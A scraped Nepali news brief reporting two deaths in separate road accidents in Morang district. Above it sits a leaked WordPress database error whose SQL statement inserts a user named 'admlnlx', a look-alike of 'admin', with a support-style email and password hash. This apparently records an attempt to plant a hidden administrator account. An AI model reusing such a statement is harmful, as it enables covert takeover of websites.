WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BCZ6n2nQs5KzuOUFo7NPWWVhLNmFz31', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 07:25:22', '', 'admlnlx', 'admlnlx')
विराटनगर, पुस १० –
मोरङमा छुट्टाछुट्टै सडक दुर्घटनामा आज दुई जनाको मृत्यु भएको छ ।
कौसी–हरैँचा–३ स्थित सडकखण्डमा को ८ प ७६४ र को २ प १८०८ नंको मोटरसाइकल ठक्कर खाँदा कौसी– हरँैचा –४ बस्ने अन्दाजी ५० वर्षीय लोकनाथ दाहालको मृत्यु भएको क्षेत्रीय प्रहरी कार्यालय, विराटनगरले जनाएको छ ।
सोही घटनामा दाहालकी १० वर्षीया छोरी आकृति तथा लखन्तरी– ९ का ४८ वर्षीय देवनाथ माझी र ३० वर्षीया सुकनी माझी घाइते भएका छन् ।
यसैबीच सुन्दर–दुलारी–१ मा शनिबार अपराह्न बा १ घ ५६६ नंको दूधको ट्यांकरबाट ठक्कर खाएर गम्भीर घाइते भएकी सोही ठाउँ बस्ने ६१ वर्षीया यशोदा कटुवालको धरानस्थित बिपी कोइराला प्रतिष्ठानमा गए राति उपचारका क्रममा मृत्यु भएको छ । – रासस